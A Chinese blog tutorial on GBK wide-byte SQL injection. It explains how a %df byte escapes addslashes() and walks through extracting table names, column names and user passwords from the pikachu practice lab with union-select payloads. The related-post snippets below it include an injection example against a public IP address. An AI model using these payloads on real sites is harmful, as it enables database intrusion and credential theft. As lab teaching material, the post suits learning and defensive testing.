13.SQL注入-宽字节

于 2024-07-07 07:45:00 发布
阅读量537 收藏 19
点赞数 17
分类专栏: 网络安全web测试sql注入 文章标签: android sql注入 宽字节
曲云龙
本文链接:https://blog.csdn.net/weixin_46253249/article/details/140116502
版权

SQL注入-宽字节

含义:

MySQL是用的PHP语言,然后PHP有addslashes()等函数,这类函数会自动过滤 ’ ‘’ null 等这些敏感字符,将它们转义成’ ‘’ \null;然后宽字节字符集比如GBK它会自动把两个字节的字符识别为一个汉字,所以我们在单引号前面加一个%df,从而使单引号逃逸。
宽字节的注入条件有两个:
1.数据库编码设置成GB系列

这里说的GB系列编码,不是指PHP页面的编码,而是连接数据库使用的编码。

2.使用了转义函数,将GET、POST、cookie传递的参数进行过滤,将单引号、双引号、null等敏感字符用转义符 \ 进行转义。

常见的包括addslashes()、mysql_real_escape_string()函数。
转义函数的转义作用,就是我们常说的“过滤机制”。

当两个条件都满足时,才会存在宽字节注入。

具体原理:

1.通过前面的SQL注入实验可以发现,字符型的注入点我们都是用单引号来判断的,但是当遇到addslashes()时,单引号会被转义成 ’ ,导致我们用来判断注入点的单引号失效。
所以我们的目的就是使转义符 \ 失效、使单引号逃逸。
2.我们通过URL编码来分析,首先先看看这些特殊符号的URL编码:

URL转码
空格 %20
'   %27
#   %23
\   %5C

3.payload的是【%df '】,其原理是当MySQL在使用GBK编码的时候,会认为两个字符是一个繁体汉字,然后让我们的单引号%27成功逃逸
在这里插入图片描述

环境演示
通过pikachu请求宽字节注入,并且bp工具进行抓包
在这里插入图片描述

抓包的数据进行发送到repeater上进行输入payload语句测试
在这里插入图片描述

添加payload语句并发送,暴漏出所有的用户数据信息

name=%df' or 1=1#

如图所示:
在这里插入图片描述

判断可显字段
这里用order by判断字段数量会报错,不知道是什么原因。直接跳到下一步:用union select联合查询直接测试1,2是否为可显字段。
在这里插入图片描述

payload语句

name=kobe%df' union select 1,2#

可以看出第1,2个为可显字段
在这里插入图片描述

爆数据库名。
可以看到数据库名为pikachu,还有数据版本。
在这里插入图片描述

爆数据库表名。
注释:按照之前union联合查询注入的payload,【union select group_concat(table_name),2 from information_schema.tables where table_schema=“pikachu”】里面是存在引号的,但如果用%df来使引号逃逸,就会使查询语句出错,所以后面的payload都是用嵌套查询,避免使用引号。

name%df' union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),2#

遍历出来所有的表名
在这里插入图片描述

暴字段名

kobe%df' union select (select group_concat(column_name) from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database())limit 3,1)),2#

如图所示,暴漏出字段名
在这里插入图片描述

爆字段内容。

kobe%df' union select (select group_concat(username,0x3b,password) from pikachu.users),2#

数据库对应的用户名和密码,直接解密即可;
在这里插入图片描述

愿听风成曲
关注
  • 17
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL Injection7(字节注入2)
kid的博客
05-10 313
SQL Injection7(字节注入2) 前言 前面结合sqli的32关卡初步理解了字节注入方法与原理 这里再结合sqli剩下的字节注入关卡(33,34,35,36,37)进行一个巩固和学习 练习 Less-33 这个我试了下,结果发现和Less-32完全一样啊,按照Less-32方法来完全可行 SQL Injection6(字节注入) 这里可以看我的上一篇博客,注入方法完全一样 我查了...
SQL注入字节注入
秋水的博客
09-01 1263
字节注入简介 背景: 尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统一的国际规范。但仍然有很多,包括国内及国外(特别是非英语国家)的一些cms,仍然使用着自己国家的一套编码,比如我国的gbk,作为自己默认的编码类型。也有一些cms为了考虑老用户,推出了gbk和utf-8两个版本(例如:dedecms) 编码简介: 我们就以gbk字符编码为...
sql注入字节注入详解
最新发布
Yuppie001的博客
04-14 1059
1.什么是字节?2.字节注入原理二.sqli-labs-36关。
SQL注入实战:字节注入
ting_liang的博客
01-21 1053
2、数据库使用的是GBK编码,PHP编码为UTF8就可能出现字节注入,原因是为了防止发生SQL注入,会调用上面所介绍的几种函数,将单引号或双引号转义操作,在单或双引号前加斜杠(\)。1、%DF':会被PHP当中的addslashes函数转义为“%DF\’",\在URL里是“%5C”,那么也就是说,“%DF'"会被转成“%DF%5C%27,倘若网站的字符集是GBK,MYSOL使用的编码也是GBK的话,就会认为“%DF%5C%27"是一个字符。addslashes()函数。二、php中的字节
字节注入实例
七月_的博客
08-09 2101
http://103.238.227.13:10083/?id=1 我们看一下html源码 看到编码变化了 所以是字节注入   所以我们要用%df来代替一个字节 http://103.238.227.13:10083/?id=1%df   页面正确 加个单引号页面报错 http://103.238.227.13:10083/?id=1%df’ 页面报错 存在注入  ...
第十九节 字节SQL注入-01
09-15
字节SQL注入基础知识点总结 字节SQL注入是一种特殊类型的SQL注入攻击,主要针对使用字节字符集(如GBK、UTF-16等)的数据库管理系统。字节SQL注入攻击的关键在于exploit字节字符集的特性来 bypass 数据库...
封神台SQL注入-字节
qq_40941912的博客
10-05 387
一、原理 magic_quotes_gpc(魔术引号开关) magic_quotes_gpc函数在php中的作用是判断解析用户提交的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。 单引号(’)、双引号(”)、反斜线(\)与 NULL(NULL 字符)等字符都会被加上反斜线 GBK全称《汉字内码扩展规范》,gbk是一种多字符编码。他使用了双字节编码方案,因为双字节编码所以gbk编码汉字,占
SQL注入--字节注入
weixin_44940180的博客
08-04 774
什么是字节 当某字符的大小为一个字节时,称其字符为窄字节 当某字符的大小为两个字节时,称其字符为字节 所有英文默认占一个字节,汉字占两个字节 常见的字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等等 使用字节注入的前提 数据库使用了gbk编码 使用了过滤函数,将用户输入的单引号转义(mysql_real_escape_string,addslashes) 这样被处理后的sql语句中,单引号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单引号无法发挥和前后单引号
SQL注入-字节注入
渗透笔记
01-13 718
1. GBK编码 gbk为中文编码,是一种双字节编码,将两个字节编译为一个汉字,其中第一个字节称为高位字节,第二个字节称为低位字节。 编码范围 高位81-FE 低位40-FE 2.字节注入原理 2.1php测试代码 error_reporting(0); $id = $_GET['id']; $id = addslashes($id);
25-2 sql注入攻击 - 字节注入
weixin_43263566的博客
03-04 591
在 PHP 中使用 addslashes() 函数对输入进行转义,但在 GBK 编码下,部分特殊字符可能会以多个字节表示,从而绕过 addslashes() 的转义。然而,PHP中的字节 addslashes() 函数是一个自定义的函数,它不是PHP标准库中的原生函数。在PHP中,addslashes() 函数用于在字符串中的某些字符前添加反斜杠。变量拼接到 SQL 查询语句中,这样容易受到 SQL 注入攻击,特别是在GB2312、GBK等中文编码环境下,可以利用字节注入绕过转义,造成安全隐患。
SQL注入字节注入)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-28 227
文章目录前言一、环境二、字节注入漏洞代码三、字节注入原理四、字节注入漏洞测试 前言 在注入时通常会使用单引号、双引号等特殊字符。在应用中,通常为了安全,开发者会开启php的magic_quotes_gpc,或者使用addslashes、mysql_real_escape_string等函数对客户端传入的参数进行过滤,则注入的单引号或双引号就会被"\"转义,但是,如果服务端的数据库使用的是GB2312、GBK、GB18030等字节的编码时,则依然会造成注入。 一、环境 PHP 5.4.45
SQL注入字节注入
qq_68163788的博客
01-31 2091
字节注入中,攻击者利用数据库编码中的特性,通常是双字节字符编码(如GB2312、GBK等),来绕过应用程序对输入进行的过滤。攻击者可以通过在输入中插入特定的编码字符来修改SQL查询的语义,从而执行恶意操作。这种技术通常用于绕过应用程序对单字节字符的过滤,使得攻击者能够成功注入恶意SQL代码。 举个例子,假设应用程序在处理用户输入时没有正确过滤并且使用了双字节字符编码。攻击者可以在输入中插入特定的双字节字符,使得SQL查询被修改,从而绕过认证、获取敏感数据或者修改数据库内容。
sql字节注入
qq_63157899的博客
04-07 4708
sql注入中最关键的一步就是将引号进行闭合,而常见的addslashes()函数、mysql_escape_string函数、get_magic_quotes_gpc()函数、mysql_real_escape_string()函数的使用将引号进行了转义,这时我们要绕过这些函数进行注入,字节注入就是其中一种方法。 何时能进行字节注入 1.mysql数据库使用GBK编码 2.对引号进行了转义(加\) 特殊情况: 1.数据库使用了安全的编码模式 2.使用了iconv() 函数进行一些特殊
sql注入字节注入
shy的博客
11-19 231
利用场景: 1,网站对客户端输入的引号等字符进行了转义 2,网站数据库采用了gbk编码 代码分析: <?php //header("Content-Type: text/html; charset=gb2312"); $id=isset($_GET['id'])?addslashes($_GET['id']):11;//使用addslashes()对参数$id进行了过滤 $con=mysqli_connect('localhost','root','root'); mysqli_select
sql-labs字节注入
07-28
字节注入中,攻击者通过在输入的数据中插入特殊编码的字节字符,绕过了数据库的输入过滤和检查,成功执行恶意的 SQL 语句。这种攻击技术主要针对使用双字节字符集编码(如 GBK、Big5 等)的数据库。 SQL-Labs...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

愿听风成曲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值